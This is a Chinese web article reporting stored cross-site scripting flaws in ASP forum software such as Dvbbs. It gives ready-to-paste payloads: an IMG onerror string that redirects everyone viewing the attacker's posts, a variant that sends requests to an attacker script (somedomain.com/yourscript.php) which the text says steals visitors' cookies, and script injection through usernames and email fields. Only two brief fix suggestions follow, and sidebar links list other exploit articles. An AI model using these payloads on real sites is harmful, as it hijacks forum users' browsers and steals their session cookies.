经过对国内多个ASP论坛的研究，比较出名的我都测试过了，99.99%存在下列问题。下面是比较常见的，出现在动网论坛，极限论坛等。

问题一：
一般论坛允许用户使用自己的个性图片，在个性图片或者其他可以进行输入的地方，输入下面script <IMG SRC="http://about:test"onerror="top.location.href='http://定向位置';"> 将能将用户的浏览器重定向。
<IMG SRC="http://about:test"onerror="this.src='_blank>http://somedomain.com/yourscript.php';">
此处, yourscript.php 是一个接收用户 cookie 的脚本，攻击者将能获得用户 Cookie。
以用户浏览器重定向为例，因为论坛程序会在每个你发的tip上面以<img src=你的图片位置>，所以只需要在个性图片的位置中填写
"http://about:test"onerror="top.location.href='http://定向位置';"
或者
http://about:test"onerror="top.location.href='http://定向位置';
则浏览者在浏览所有你post的tip时浏览器就会被重定向到http://定向位置，至于获取用户cookies的方法也是一样的

问题二：
另外有部分ASP论坛只要注册名字如<script>的用户，可以导致论坛页面变形。
原理：没有对用户名字进行过滤，而一般论坛都会在论坛首页显示最新注册用户的名字，则该名字以一个变量的形势破坏整个页面。
利用：如果没有对用户名长度进行限制，可以实现上面所说的重定向浏览器和取得用户cookies。

问题三：
最后一个问题，就是第一个问题的延伸与利用。
由于程序本身不进行过滤，所以在其他一些填写用户信息的地方同样可以实现第一个攻击方法。
例如在填写email的位置填写<script>alert('fuck')</script>fuck@somedomain.com
如果不可信可以尝试><script>alert('fuck')</script>fuck@somedomain.com
同样的，在其他地方例如个人主页一样可以实现（我觉得这个是最好利用的，因为前面就已经会以a herf帮你提交）

解决办法:
1．对该几处设置进行过滤（建议使用）
2．对长度进行限制（不推荐）

相关新闻

·winXP登录的BUG！
·动网7.0+Access+sp2 最新漏洞
·动力3.51网站管理系统的又一收费漏洞及其解
·Acrobat Reader5.1溢出漏洞分析
·乔客论坛upload.asp 文件简单分析
·利用CCproxy漏洞实现免费上网
·黑基原创:站内上传脚本图片欺骗式攻击

热评文章

·悬挂阿里妈妈会否被百度惩罚
·阿里妈妈是否是中小站长的救世主?
·搜搜问问抢不了百度知道的饭碗
·网络的成功在于与传统商业的联姻
·Google绿色专家质疑黑色背景网页节省资源
·我的网络，我的团队:专访李文明
·网聚力量矜持是道专访聚吧站长欠情
·色•戒•网络：均在欲望中纠缠
·访谈录 非主流巴士网站长球球快跑
·站长访谈：天道酬勤 青春有梦
·草根站长团队建设浅析
·随爱而行 专访湛蓝城堡三位女管理员
·评论：博客实名黯然退场 网络管制宜有反思
·百度新闻频道改版十天 流量止跌反弹翻了一
·爆笑 阿里就这样把亿告征服！

最新图文

• 
  做就做自己喜欢的
• 
  什么样的网上简历最“抢
• 
  一个女站长的网络历程
• 
  盘点"非主流"的发展史

站长学院　　网页设计 建站教程 图形图象 网络编程

Photoshop CS3

不用Photoshop

DIV+CSS的开发方式 听听另外的
虚拟主机建站动易里快速生成的
VBScript特效代码 满屏幕乱跑
牛气！一个菜鸟站长的超强网站
创建、维护一个个人博客的“投
让网站流量稳步飙升的秘籍
网站推广的基本思想

地区性网站经营方法及误区 因多添加一段代码而惹的祸－－ 怎么让10天的新网站,有100个外

• 
  Photoshop简单几步快速
• 
  Photoshop参数预设与图
• 
  Photoshop简单几步打造
• 
  无价：Photoshop制作一

新闻线索

如果你有站长界人事变动、重组并购、变革技术出现，以及产品投诉等重要新闻线索，请告诉我们，我们会给予特别关注。
0631-3653338
站长中国编辑部
站长中国24小时新闻热线： 13256307008